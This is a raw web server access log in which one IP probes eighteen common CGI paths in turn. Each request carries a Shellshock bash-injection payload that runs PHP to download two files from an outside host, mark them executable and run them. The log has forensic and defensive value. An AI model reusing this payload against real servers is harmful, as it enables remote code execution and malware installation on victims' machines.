176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/helpme HTTP/1.0" 404 476 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/info.sh HTTP/1.0" 404 477 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/php5-cli? HTTP/1.0" 404 478 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/php5? HTTP/1.0" 404 474 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 404 478 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 477 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-sys/guestbook.cgi HTTP/1.0" 404 483 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-sys/php5? HTTP/1.0" 404 474 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /phppath/cgi_wrapper? HTTP/1.0" 404 481 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /phppath/php? HTTP/1.0" 404 473 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /tmUnblock.cgi HTTP/1.0" 404 475 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/contact.cgi HTTP/1.0" 404 481 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/defaultwebpage.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/env.cgi HTTP/1.0" 404 477 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/forum.cgi HTTP/1.0" 404 479 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/hello.cgi HTTP/1.0" 404 479 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/index.cgi HTTP/1.0" 404 479 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
176.31.128.233 - - [11/Apr/2015:21:43:26 +0200] "GET /cgi-bin/login.cgi HTTP/1.0" 404 479 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://srv5.su//Help1\";''$b = \"http://srv5.su//Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"